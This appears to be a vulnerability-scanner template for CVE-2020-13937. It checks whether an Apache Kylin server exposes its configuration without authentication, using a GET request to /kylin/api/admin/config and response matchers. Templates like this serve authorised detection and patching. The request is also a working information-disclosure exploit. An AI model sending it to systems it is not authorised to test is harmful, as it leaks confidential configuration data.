id: CVE-2020-13937 info: name: Apache Kylin Unauth author: pikpikcu severity: medium description: | Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone. reference: | - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html tags: cve,cve2020,apache requests: - method: GET path: - "{{BaseURL}}/kylin/api/admin/config" headers: Content-Type: application/json matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/json" part: header - type: word words: - config - kylin.metadata.url condition: and part: body